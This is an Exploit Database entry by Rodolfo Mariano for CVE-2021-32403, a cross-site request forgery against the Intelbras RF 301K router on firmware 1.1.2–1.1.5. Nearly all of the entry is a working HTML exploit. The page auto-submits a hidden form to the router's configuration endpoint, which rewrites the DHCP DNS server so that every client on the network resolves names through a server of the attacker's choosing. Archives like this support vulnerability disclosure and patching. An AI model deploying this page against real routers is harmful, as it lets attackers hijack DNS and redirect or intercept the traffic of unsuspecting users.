Intelbras Router RF 301K – ‘DNS Hijacking’ Cross-Site Request Forgery (CSRF)

• Exploit Database
• 20 阅读

• 作者： Rodolfo Mariano
  日期： 2021-06-09
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/49969/

• # Exploit Title: Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF)
  # Date: 01/05/2021
  # Exploit Author: Rodolfo Mariano
  # Version: Firmware 1.1.2-1.1.5
  # CVE: 2021-32403
  
  # Exploit Code: 
  <html>
  <form action="http://10.0.0.1/goform/setSysTools" method="POST">
  <input name="module3" value="lanCfg" type="hidden">
  <input name="lanIP" value="10.0.0.1" type="hidden">
  <input name="lanMask" value="255.255.255.0" type="hidden">
  <input name="dhcpEn" value="true" type="hidden">
  <input name="lanDhcpStartIP" value="10.0.0.100" type="hidden">
  <input name="lanDhcpEndIP" value="10.0.0.200" type="hidden">
  <input name="lanDns1" value="192.168.0.30" type="hidden">
  <input name="lanDns2" value="" type="hidden">
  </form>
  <script>
  document.forms[0].submit();
  </script>
  </html>